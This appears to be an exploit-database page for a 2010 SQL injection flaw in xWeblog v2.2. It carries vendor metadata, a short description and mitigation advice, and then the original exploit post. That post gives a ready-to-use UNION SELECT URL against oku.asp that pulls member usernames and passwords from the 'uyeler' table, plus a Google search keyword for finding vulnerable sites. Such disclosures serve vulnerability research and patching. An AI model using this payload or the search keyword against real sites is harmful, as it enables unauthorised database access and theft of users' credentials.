xWeblog v2.2 - Remote SQL Injection Vulnerability (tr)

vendor:

xWeblog

by:

KnocKout

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: xWeblog

Affected Version From: 2.2

Affected Version To: 2.2

Patch Exists: N/A

Related CWE: N/A

CPE: a:aspdunyasi:xweblog:2.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

xWeblog v2.2 – Remote SQL Injection Vulnerability (tr)

A remote SQL injection vulnerability exists in xWeblog v2.2. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to sensitive information stored in the database.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries. Additionally, developers should use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

===================================================
xWeblog v2.2 - Remote SQL Injection Vulnerability (tr) 
===================================================

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : xWeblog v2.2
~Software: http://www.aspdunyasi.com/goster.asp?id=19
~Vulnerability Style : (SQLi)
~Google Keywords : "XWEBLOG"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
    ~~~~~~~~ Explotation ~~~~~~~~~~~
 
    SQL Injection
    ================================
    http://TARGET/path/oku.asp?makale_id=-67%20UNION%20SELECT+0,AD,SIFRE,3,4,5,6,7,8,9,10,11,12%20from%20uyeler
    ================================
          [+]  SQL Injected!
 
           
       
      GoodLucK ;)


# Inj3ct0r.com [2010-09-28]